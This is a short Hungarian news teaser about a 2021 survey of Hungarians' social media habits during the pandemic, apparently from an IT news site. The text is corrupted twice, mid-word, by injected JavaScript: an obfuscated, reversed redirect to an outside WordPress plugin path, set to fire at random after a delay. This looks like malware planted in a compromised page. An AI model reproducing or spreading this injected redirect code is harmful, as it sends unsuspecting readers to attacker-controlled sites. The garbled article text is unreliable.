A kutatás 2021. májusában 1003 személyből álló felnőtt mintán készült azzal a céllal, hogy felmérje a közösségi média használati szokásokat a magyar lakosság körében. A felmérés rámutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott arra, hogy a magyarok 10 éve viszonylag aktívak a közösségi médiában, a lakosság csupán 3 százaléka nem használja ezeket a platformokat. A közösségi médiát használók platformonként átlagosan napi 1-2 órát töltenek el online. Kiemelték, a világjárvány befolyásolta a magyarok közösségi médiahasználatának gyakoriságát, a megkérdezettek 40 százaléka többször használta a közösségi médiát, mint a világjárvány előtt. A kutatás alapján 78 százalék a közösségi médiát elsősorban a barátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokkal és a családdal való kapcsolattartásra, 63 százalék…
A cikk folytatódik: http://itmozaik.co.hu/hirek/2021/08/13/kaspersky-felertekelodott-a-kozossegi-media-a-jarvany-alatt.html
- Hirdetés -